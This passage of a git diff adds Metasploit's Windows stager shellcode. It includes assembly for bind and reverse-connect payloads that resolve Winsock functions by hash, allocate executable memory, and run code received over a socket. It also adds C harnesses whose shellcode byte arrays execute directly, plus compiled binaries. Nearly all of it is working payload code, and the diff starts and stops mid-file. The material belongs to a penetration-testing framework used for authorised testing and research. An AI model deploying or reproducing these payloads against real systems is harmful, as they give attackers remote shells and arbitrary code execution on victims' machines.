+    mov ebx, [fs:ecx]
+    mov ebx, [ebx + 0x0c] 
+    mov ebx, [ebx + 0x1c] 
+    mov ebx, [ebx]		  
+    mov ebx, [ebx + 0x08]
+
+    push ebx                ; kernel32.dll base
+    push 0xec0e4e8e         ; LoadLibraryA
+    call esi                ; GetProcAddress(kerne32.dll, LoadLibrary)
+    mov edi, eax
+	
+    push ebx                ; kernel32.dll base
+    push 0x91afca54         ; VirtualAlloc
+    call esi                ; GetProcAddress(kerne32.dll, VirtualAlloc)
+   
+    ; ebx = kernel32.dll base
+    ; esi = LGetProcAddress
+    ; edi = LoadLibraryA
+	; eax = VirtualAlloc
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_bind.asm
new file mode 100644
index 0000000000..8addaeaa78
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_bind.asm
@@ -0,0 +1,33 @@
+;      Title:  Win32 Reverse Connect Payload
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_winsock_bind.asm"
+
+
+LBind:
+    xor ebx, ebx
+    push ebx
+    push ebx
+    push dword 0x11220002 ; port 8721
+    mov eax, esp
+    push byte 0x10        ; length
+    push eax
+    push edi
+    call FN_BIND
+
+LListen:
+    push ebx
+    push edi
+    call FN_LISTEN
+
+LAccept:
+    push ebx
+    push esp
+    push edi
+    call FN_ACCEPT
+    mov edi, eax
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_inlineegg.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_inlineegg.asm
new file mode 100644
index 0000000000..7ae75c6f6d
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_inlineegg.asm
@@ -0,0 +1,10 @@
+;      Title:  Win32 Reverse Connect Read Payload
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_bind.asm"
+%include "win32_stage_inlineegg.asm"
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.asm
new file mode 100644
index 0000000000..8722a7c654
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.asm
@@ -0,0 +1,34 @@
+;      Title:  Win32 Reverse Connect Read Payload
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_bind.asm"
+
+LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE)
+
+	push byte      0x40
+	pop esi
+	push esi                ; PAGE_EXECUTE_READWRITE=0x40
+
+	shl esi, 6              ; MEM_COMMIT=0x1000
+	push esi
+
+	shl esi, 8              ; 1MB
+	push esi
+	
+	push byte      0x00     ; NULL
+	call [ebp+12]
+	mov ebx, eax
+	
+
+LRecvLength: ; recv(s, buff, 4, 0)
+    push byte 0x00          ; flags
+    push 4096               ; length
+    push ebx                ; buffer
+    push dword edi          ; socket
+    call FN_RECV            ; recv()
+    call ebx
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.bin b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.bin
new file mode 100644
index 0000000000000000000000000000000000000000..cab4531bcef3d82bc62d8f57ea0db534fdbb27b1
GIT binary patch
literal 301
zcmaD6#=yW392yqhoueYr?P}8<!dk)js@qGVJ4%7^^<yK?Zj)}tcZUD}7#>(-@t}nL
z;CWug<F7wi*Qkh;KJ1QCVSJs|&Ewr2CByi-o28ra#cL+R1MzXO(T6w~;<5}PQ@SO)
zqj|ccWxA!iqd9^z`uzCb{J++DJUAod)cT44uQk45U}Rtj2oDSHeELEi=#&XS?lwt@
z=Sw6DUOx3~^IRfTaD2&Hy_YvRzpg#~_K$UVuu;6R5kqvZw?g3m>z(&I5BHXeWU)sE
z2LCtd{~yW{*~!xP=##d3$ba+yp$3Kr0)W5)2>*xbbRIXn9UPp&#GoYD`5;RmApC!*
uN-&Vn2o3>~3Z2KZ9OA+bK4Sx7j<76-|DimchqD+m7zBU;1XLjL|1tp8t$uO<

literal 0
HcmV?d00001

diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.c b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.c
new file mode 100644
index 0000000000..b288941939
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.c
@@ -0,0 +1,29 @@
+
+char code[] =
+"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"
+"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
+"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
+"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
+"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
+"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
+"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
+"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"
+"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00"
+"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xe5\x49\x86\x49"
+"\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b"
+"\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf"
+"\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04"
+"\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x30\x31\xc0"
+"\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x2c\x89\xc7\x31\xdb\x53"
+"\x53\x68\x02\x00\x22\x11\x89\xe0\x6a\x10\x50\x57\xff\x55\x24\x53"
+"\x57\xff\x55\x28\x53\x54\x57\xff\x55\x20\x89\xc7\x6a\x40\x5e\x56"
+"\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a"
+"\x00\x68\x00\x10\x00\x00\x53\x57\xff\x55\x18\xff\xd3";
+
+
+int main(int argc, char **argv)
+{
+  int (*funct)();
+  funct = (int (*)()) code;
+  (int)(*funct)();
+}
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.elf b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.elf
new file mode 100755
index 0000000000000000000000000000000000000000..57f04909f3f26a2bda7bf79ec3a4187c9c99e6c7
GIT binary patch
literal 1003
zcmah|-%Aux6h5;%x+_?$V6dA)Q!FU`7<P3b#UAXzzzkWLon3Tkhq0X)hn-EFkqm<D
zB^WMR{s%tznAB7BsQIu^NI_sk4_RTYtpy3a3Ab~1c4+j)Gn{+QcfNbixtuxo!O)Fs
z9LIqt0SE#^%kz9Vg*F;+nG^^RfNp4R@bxI}0n|-Az_f`4BLMTKc+EX^WbFpvkA#kc
z)hzCi<ZO<V;!!emg=CuMxS!;DluQU*?OV?<NfGXMk{%@2p7w3qq4l>XxJqq*;C{S)
z_6wPabG6%~b%acGay7yeu38Hu*ObD|{Hrh&jKp}6#7MrC<U2_R$%iF<arERK-Eu0D
zo_YOjiEcgIW8FySvXZk??ZT@(LHHsT{jn08-rX5~G`w<py0Wq=?tX0fyZYwW!9Y&x
zQF?nIzc3<<(GSjNXJcWu-3X13Ni_AC%KW&)FMi#>(3PQ=shmizrBMd)qw+<klKdn|
zdH~L~Ion1gouhJG!lhfv;3_y3W3Z52|K5xm&Kf}FR%gQiopqdTi_-Uy(KTUIv+qt7
zHQ}mdY35`}n-LOXf1lXf4<K6iOk15qYtOh=_dHvhvq8Ld$27IFecVs+@g3-6OK>jS
znOR1Ai3J*hm#fQJTz%pCyqsxp%y?WI`axfO4~g?W?CoQ=F`9KYjEA11$7V2u%I1vK
zZb9|udx@YIW1e{VJnXmZ4KVD!i2qFRP-VvZD=>U`%7b_-e;pqF&~{Ac<&PlC`nb8|
z){7v|X3dX9#P57Ol%~qFbBe8*(<Rl`MAb4uv21n521S{)EYH`9s;z>em5cBXO)kYZ

literal 0
HcmV?d00001

diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.exe b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.exe
new file mode 100644
index 0000000000000000000000000000000000000000..e613af04e3424b592521f953cecbe98f9bd2113c
GIT binary patch
literal 3072
zcmeZ`VqjorU|?VY;{X2{7<K?@5O4sK_=yIfG@tw~K87uvXBBra`kYk^$;d2LC@9KL
zFG|c+NKVYl%P&z#N>wN-%~QzCQ*iMQR>;jyN!8=!Qh}Kq;L5<@!^jHbg6Rhg%#7TO
zKqeCqgB&J+gcX2nkn2EVKzWcf2*7BD1Ox}99UDLq4`5)>z@~`CVtOU16(vABj6wc{
z`UT+$h~)_k3=i~*QW8rN85lsy7!-gQ<ajn9Mgk7N0MUaegQznAN`lmJASnVe9T*r6
z=p_{wgGE6G0tK*v29UZ;h=IW%1;8)@o5uy>Ab<l-6A)@fS%W(SUW5VN7aSTE-kqZ&
z(d}x}9l~0{_^R7WqB}}~@%3XP&u)`$#&?GQ{}>)vWAUJb{or|C#^bL)S=XqDls@c^
zQek|Z*3IMH9VNr~x|^k&@x^N<!vpbgvC)S(7~--FB2&60yQ6u!qh-3KyQ4XRGy44a
z-u%DTc|15H<kb3!|F1Q^0j1c0@UY;{r!UljPMHAYZj+RFzC^O%<x|f#&m~d?$Cs?t
zdwG-d>)O+A|5%3y8^s$NF+}%zD+K<(-g&?CaBrzd7JFo1@PCv3|Di0Aoh*HiK546m
z{5Ss}YG8OE00<m_@PDXI=W)Z^!ND0!3`&BX53&RT!vBY=1Oo|;;1D3G(0M$|AujCT
zGd3XR2+LylAIj5tIEx_zlsiGnB>rFiFKQ6rFu3EBRM$-)Rl}(IVHE<S@jtAhlVs0m
zfa-Q2_zwhbK(+yt4-rL>7Etk1SAOgViPkf?R%Dh06y+zU0vi<Gu0ejTKE_6RE<Qd8
KJ)^9_9|8c;kG!h@

literal 0
HcmV?d00001

diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_shell.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_shell.asm
new file mode 100644
index 0000000000..10ae1238b8
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_shell.asm
@@ -0,0 +1,10 @@
+;      Title:  Win32 Network Shell
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_bind.asm"
+%include "win32_stage_shell.asm"
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse.asm
new file mode 100644
index 0000000000..3042142976
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse.asm
@@ -0,0 +1,37 @@
+;      Title:  Win32 Reverse Connect Payload
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_winsock_conn.asm"
+
+; [ebp +  0] = kernel32.dll base
+; [ebp +  4] = LGetProcAddress
+; [ebp +  8] = LoadLibraryA
+; [ebp + 12] = VirtualAlloc
+; [ebp + 24] = recv
+; [ebp + 28] = send
+; [ebp + 32] = accept
+; [ebp + 36] = bind 
+; [ebp + 40] = connect
+; [ebp + 44] = WSASocketA
+; [ebp + 48] = WSAStartup
+; [ebp + 52] = Payload Length
+
+LConnect:
+    push 0x0100007f; host: 127.0.0.1
+    push 0x11220002 ; port: 8721 
+    mov ecx, esp
+    push byte 0x10
+    push ecx
+    push dword edi
+    call dword FN_CONNECT
+    pop ecx ; remove port
+    pop ecx ; remove host
+    
+    ; reconnect on failure
+    ; test eax, eax
+    ; jne short LConnect
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_inlineegg.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_inlineegg.asm
new file mode 100644
index 0000000000..847a79b70e
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_inlineegg.asm
@@ -0,0 +1,10 @@
+;      Title:  Win32 Reverse Connect Read Payload
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_reverse.asm"
+%include "win32_stage_inlineegg.asm"
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.asm
new file mode 100644
index 0000000000..3c303d8419
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.asm
@@ -0,0 +1,26 @@
+;      Title:  Win32 Reverse Connect Read Payload
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_reverse.asm"
+
+
+LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE)
+	push byte      0x40     ; PAGE_EXECUTE_READWRITE
+	push dword   0x1000     ; MEM_COMMIT
+	push dword 0x100000     ; 1Mb
+	push byte      0x00     ; NULL
+	call [ebp+12]
+	mov ebx, eax
+	
+LRecvLength: ; recv(s, buff, 4, 0)
+    push byte 0x00          ; flags
+    push 4096               ; length
+    push ebx                ; buffer
+    push dword edi          ; socket
+    call FN_RECV            ; recv()
+    call ebx
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.bin b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.bin
new file mode 100644
index 0000000000000000000000000000000000000000..51f795b33c19185d20eea69e0195ca1fc0677053
GIT binary patch
literal 283
zcmaD6#=yW392yqhoueYr?P}8<!dk)js@qGVJ4%7^^<yK?Zj)}tcZUD}7#>(-@t}nL
z;CWug<F7wi*Qkh;KJ1QCVSJs|&Ewr2CByi-o28ra#cL+R1MzXO(T6w~;<5}PQ@SO)
zqj|ccWxA!iqd9^z`uzCb{J++DJUAod)cT44uQk45U}Rtj2oDSHeELEj=#&XS?lwt@
z=Sw6DUcULcD&Z#Q*R`kL{;>`ZHi|bkVu<ebmI(ZRz4LzO;oee_EY`@t;QuE5|3g_K
zJ6ZZ3ebQDB`EUL|RKxH<01!9;;r~#T&f^*N3=E7JObkkboe#4F0>l4@Dnv$RIb<*h
cFfe2=0Ld(d|DimchqHh@pinSSfyDpI0C=}?7XSbN

literal 0
HcmV?d00001

diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.c b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.c
new file mode 100644
index 0000000000..730ce91b4d
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.c
@@ -0,0 +1,28 @@
+
+char code[] =
+"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"
+"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
+"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
+"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
+"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
+"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
+"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
+"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"
+"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00"
+"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60"
+"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"
+"\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59"
+"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"
+"\x54\xff\x37\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50"
+"\xff\x55\x24\x89\xc7\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11\x89"
+"\xe1\x6a\x10\x51\x57\xff\x55\x20\x59\x59\x6a\x40\x68\x00\x10\x00"
+"\x00\x68\x00\x00\x10\x00\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x68"
+"\x00\x10\x00\x00\x53\x57\xff\x55\x18\xff\xd3";
+
+
+int main(int argc, char **argv)
+{
+  int (*funct)();
+  funct = (int (*)()) code;
+  (int)(*funct)();
+}
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.elf b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.elf
new file mode 100755
index 0000000000000000000000000000000000000000..ed4b42c5ae0374d551a5dab71802a407dcac32f6
GIT binary patch
literal 983
zcmah{O=}ZT6upy7Yzk3Qh>(ziqXZfhLh}K()J0uX&`N2Te2@e?CT3(Bl2|emj3Bfw
zhexaZ2VHa}imu$$MYM~6E?fu|-DnjtnkZOwArzkXWimR=rZ>E~@0|1I-j_RPdFJv3
zj^n@#8`y!NjTPP*!_3<ZB?bc6AP7hLdXL33fNKk1V9UWsH^9nqUN+tucm}cF0CgB_
zr|^WBOr=RV;3YHXNW#(JzL85_k`=hlr^rPTBixTL-48b(OnlIWp1nHCwK{uKw*#K~
zF3ASC&UNCNCD~D~LwLfqJGO9BTDX#X?u3QXc&12vB<CWzQQ{{#r>LyW9qZB^y(KD%
z7mwEI&Ydos#(X*@>Yv*u@GAEZKJj_KZ2FeIcK_VJ`gZvD!<XOpr_y3Xibf!}I_r(o
zH~M>hd$sN<IWlpP#_rN2pV9fXk9%jv67(!h2E)yHjA{JQWI%5z%K)5WgHt2=Zpj@_
z)1;8el%^FnOoffK1T^W=w@ZkS67hhSzJ`P%3v;q|bFnB3=T%j%6v}c<7!OTOgrbuG
zA@x>8%NH<fH6ttLPLmrNgs$DFROG65*eCd>`*DYVA3b3BV*|6F5&gic_2MKxEp*Qt
zY<6at+6WSMlf?WEh0_*no@2Rh!=CyJ!DHMpzYXDHo?^X+aarqaB8VbqhFQ<V*3A6Q
zu;Kpyiv2)mrdvBOe9+N$yp^>N4?n2~%bE4vsIob3tsDK^sE-Zc5aOp69m<Q<dPCCW
h%2GM6$)UVj0ZG;JH4P-GpsMCxF6Om7NOH9Ze*w|4xD5aR

literal 0
HcmV?d00001

diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.exe b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.exe
new file mode 100644
index 0000000000000000000000000000000000000000..1b5d0fff817b9c782a5e2141e2e6e7006cacc06c
GIT binary patch
literal 3072
zcmeZ`VqjorU|?VY;{X2{7<K?@5O4sK_=yIfG@tw~K87uvXBBra`kYk^$;d2LC@9KL
zFG|c+NKVYl%P&z#N>wN-%~QzCQ*iMQR>;jyN!8=!Qh}Kq;L5<@!^jHbg6Rhg%#7TO
zKqeCqgB&J+gcX2nkn2EVKzWcf2*7BD1Ox}99UDLq4`5)>z@~`CVtOU16(vAB6hZ!k
z`UT+$h~)_k3=i~*QW8rN85lsy7!-gQ<ajn9Mgk7N0MUaegQznAN`lmJASnVe9T*r6
z=p_{wgGE6G0tK*v29UZ;h=IW%1;8)@o5uy>Ab<l-6A)@fS%W(SUW5VN7aSTE-kqZ&
z(d}x}9l~0{_^R7WqB}}~@%3XP&u)`$#&?GQ{}>)vWAUJb{or|C#^bL)S=XqDls@c^
zQek|Z*3IMH9VNr~x|^k&@x^N<!vpbgvC)S(7~--FB2&60yQ6u!qh-3KyQ4XRGy44a
z-u%DTc|15H<kb3!|F1Q^0j1c0@UY;{r!VAzPMHAYZj+RFzC^O%<(r?Y5^i#SU3>cN
zAM5a7qj+N@hUi{ziNOEYJMVWM?kyF`VvP(8{%_L%Ka?f1lcn#`CvEkR|K|TgH4F~~
z0D%J#{ts2@Jf2Yx%s?4T3`&BX53>XU!~cgWL`G&gWPmbW1}OVwG5inZ={%eT<N<|(
zfeIx4U;Zy@5a2MlV~=vzO`zO}Q4@x62#m)65RN=5I9($EV#t3Wa09XppnP<rEuiA3
ruKd^!lB;KMt;j41D9TSx1vV(WU4#5weT<FtTzq`cb&m1}a|i$cqcX2P

literal 0
HcmV?d00001

diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_shell.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_shell.asm
new file mode 100644
index 0000000000..6c431cfa97
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_shell.asm
@@ -0,0 +1,10 @@
+;      Title:  Win32 Network Shell
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_reverse.asm"
+%include "win32_stage_shell.asm"
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_shell_revert.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_shell_revert.asm
new file mode 100644
index 0000000000..54547cc9b4
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_shell_revert.asm
@@ -0,0 +1,11 @@
+;      Title:  Win32 Network Shell
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_reverse.asm"
+%include "win32_stage_revert.asm"
+%include "win32_stage_shell.asm"
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_udp.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_udp.asm
new file mode 100644
index 0000000000..b71b549caf
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_udp.asm
@@ -0,0 +1,39 @@
+;      Title:  Win32 Reverse UDP "Connect" Payload
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_winsock_conn_udp.asm"
+
+; [ebp +  0] = kernel32.dll base
+; [ebp +  4] = LGetProcAddress
+; [ebp +  8] = LoadLibraryA
+; [ebp + 12] = VirualAlloc
+; [ebp + 24] = recv
+; [ebp + 28] = send
+; [ebp + 32] = accept
+; [ebp + 36] = bind 
+; [ebp + 40] = connect
+; [ebp + 44] = WSASocketA
+; [ebp + 48] = WSAStartup
+; [ebp + 52] = Payload Length
+
+LConnect:
+    ;push 0xf401a8c0 ; 192.168.1.244
+    ;push 0xbc32a8c0 ; 192.168.50.187
+    push 0x0100007f; host: 127.0.0.1
+    push 0x11220002 ; port: 8721 
+    mov ecx, esp
+    push byte 0x10
+    push ecx
+    push dword edi
+    call dword FN_CONNECT
+    pop ecx ; remove port
+    pop ecx ; remove host
+    
+    ; reconnect on failure
+    ; test eax, eax
+    ; jne short LConnect
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_bind.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_bind.asm
new file mode 100644
index 0000000000..b13c5d5744
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_bind.asm
@@ -0,0 +1,77 @@
+;      Title:  Win32 Socket Initialization
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+[BITS 32]
+
+%include "win32_stage_api.asm"
+
+sub esp, 0x100
+push eax    ; [ebp + 12] = VirtualAlloc
+push edi    ; [ebp +  8] = LoadLibraryA
+push esi    ; [ebp +  4] = LGetProcAddress
+push ebx    ; [ebp +  0] = kernel32.dll base
+            
+mov ebp, esp
+call LLoadWinsock
+
+%define FN_RECV     [ebp + 24]
+%define FN_SEND     [ebp + 28]
+%define FN_ACCEPT   [ebp + 32]
+%define FN_BIND     [ebp + 36]
+%define FN_LISTEN   [ebp + 40]
+%define FN_WSASOCK  [ebp + 44]
+%define FN_WSASTART [ebp + 48]
+
+LWSDataSegment:
+;========================
+dd 0x190      ; used by wsastartup
+dd 0xe71819b6 ; recv        [ebp + 24]
+dd 0xe97019a4 ; send        [ebp + 28]
+dd 0x498649e5 ; accept      [ebp + 32]
+dd 0xc7701aa4 ; bind        [ebp + 36]
+dd 0xe92eada4 ; listen      [ebp + 40]
+dd 0xadf509d9 ; WSASocketA  [ebp + 44]
+dd 0x3bfcedcb ; WSAStartup  [ebp + 48]
+db "WS2_32", 0x00
+;========================
+
+LLoadWinsock:
+    pop ebx             ; save address to data in ebx
+    lea ecx, [ebx + 32] ; find address of "WS2_32.DLL"
+    push ecx            ; push address of "WS2_32.DLL"
+	call edi            ; call LoadLibraryA("WS2_32.DLL")     
+    mov edi, ebx        ; store base of data section in edi
+    mov ebx, eax        ; store base of winsock in ebx
+    lea esi, [ebp + 20] ; store base of function table
+    push byte 0x07      ; load five functions by hash
+    pop ecx             ; configure the counter
+
+Looper:    
+    push ecx                    ; save the counter
+    push ebx                    ; dll handle
+    push dword [edi + ecx * 4]  ; function hash value
+    call [ebp + 4]              ; find the address
+    pop ecx                     ; restore the counter
+    mov [esi + ecx * 4], eax    ; stack segment to store addresses
+    loop Looper
+
+LWSAStartup:                    ; WSAStartup (0x101, DATA)
+    sub esp, [edi]
+	push esp
+	push dword [edi]
+	call FN_WSASTART
+    xor eax, eax
+    
+LWSASocketA:                    ; WSASocketA (2,1,0,0,0,0) 
+	push eax
+	push eax
+	push eax
+	push eax
+	inc eax
+	push eax
+	inc eax
+	push eax
+	call FN_WSASOCK
+    mov edi, eax
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_conn.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_conn.asm
new file mode 100644
index 0000000000..db9dd86538
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_conn.asm
@@ -0,0 +1,74 @@
+;      Title:  Win32 Socket Initialization (connect)
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_api.asm"
+
+sub esp, 0x100
+push eax    ; [ebp + 12] = VirtualAlloc
+push edi    ; [ebp +  8] = LoadLibraryA
+push esi    ; [ebp +  4] = LGetProcAddress
+push ebx    ; [ebp +  0] = kernel32.dll base
+            
+mov ebp, esp
+call LLoadWinsock
+
+%define FN_RECV     [ebp + 24]
+%define FN_SEND     [ebp + 28]
+%define FN_CONNECT  [ebp + 32]
+%define FN_WSASOCK  [ebp + 36]
+%define FN_WSASTART [ebp + 40]
+
+LWSDataSegment:
+;========================
+dd 0x190      ; used by wsastartup
+dd 0xe71819b6 ; recv        [ebp + 24]
+dd 0xe97019a4 ; send        [ebp + 28]
+dd 0x60aaf9ec ; connect     [ebp + 32]
+dd 0xadf509d9 ; WSASocketA  [ebp + 36]
+dd 0x3bfcedcb ; WSAStartup  [ebp + 40]
+db "WS2_32", 0x00
+;========================
+
+LLoadWinsock:
+    pop ebx             ; save address to data in ebx
+    lea ecx, [ebx + 24] ; find address of "WS2_32.DLL"
+    push ecx            ; push address of "WS2_32.DLL"
+    call edi            ; call LoadLibraryA("WS2_32.DLL")     
+    mov edi, ebx        ; store base of data section in edi
+    mov ebx, eax        ; store base of winsock in ebx
+    lea esi, [ebp + 20] ; store base of function table
+    push byte 0x05      ; load five functions by hash
+    pop ecx             ; configure the counter
+
+Looper:    
+    push ecx                    ; save the counter
+    push ebx                    ; dll handle
+    push dword [edi + ecx * 4]  ; function hash value
+    call [ebp + 4]              ; find the address
+    pop ecx                     ; restore the counter
+    mov [esi + ecx * 4], eax    ; stack segment to store addresses
+    loop Looper
+
+LWSAStartup:                    ; WSAStartup (0x101, DATA)
+    sub esp, [edi]
+    push esp
+    push dword [edi]
+    call FN_WSASTART
+    xor eax, eax
+    
+LWSASocketA:                    ; WSASocketA (2,1,0,0,0,0) 
+    push eax
+    push eax
+    push eax
+    push eax
+    inc eax
+    push eax
+    inc eax
+    push eax
+    call FN_WSASOCK
+    mov edi, eax
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_conn_udp.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_conn_udp.asm
new file mode 100644
index 0000000000..1832017fb4
